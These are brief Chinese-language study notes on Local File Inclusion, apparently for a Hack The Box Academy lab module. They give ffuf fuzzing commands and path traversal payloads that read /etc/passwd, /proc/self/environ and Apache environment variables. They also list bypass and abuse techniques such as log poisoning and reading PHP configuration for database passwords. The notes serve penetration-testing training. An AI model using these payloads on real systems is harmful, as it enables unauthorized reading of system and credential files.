LFI

1. 發現點

  1. ?page參數

  2. ffuf -w /opt/useful/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?FUZZ=value' -fs 2287

2. 測試Payload

發現可能的 LFI 參數後,例如 ?page=,我們可以使用 Jhaddix 的 LFI 字典 來進行自動化測試:

ffuf -w /opt/useful/seclists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=FUZZ' -fs 2287

🔹 基本 LFI 測試

?page=/proc/self/environ      #for dokcer
?page=../../../../etc/passwd

🔹 Docker 內部 LFI 測試

?page=/proc/self/environ

🔹 讀取 Apache 環境變數

curl http://<SERVER_IP>:<PORT>/index.php?language=../../../../etc/apache2/envvars

3. bypass技巧

🔹 變形 ../

🔹 URL 編碼

🔹 Null Byte 截斷

🔹 測試不同 Web Root

🔹 php base64 filter

4.濫用

🔹 讀取 PHP 配置(可能包含 DB 密碼)

🔹 Base64 讀取 PHP 代碼

🔹 日誌汙染(Log Poisoning)

然後訪問:

6.Skills Assessment

https://academy.hackthebox.com/module/23/section/513

最后更新于

这有帮助吗?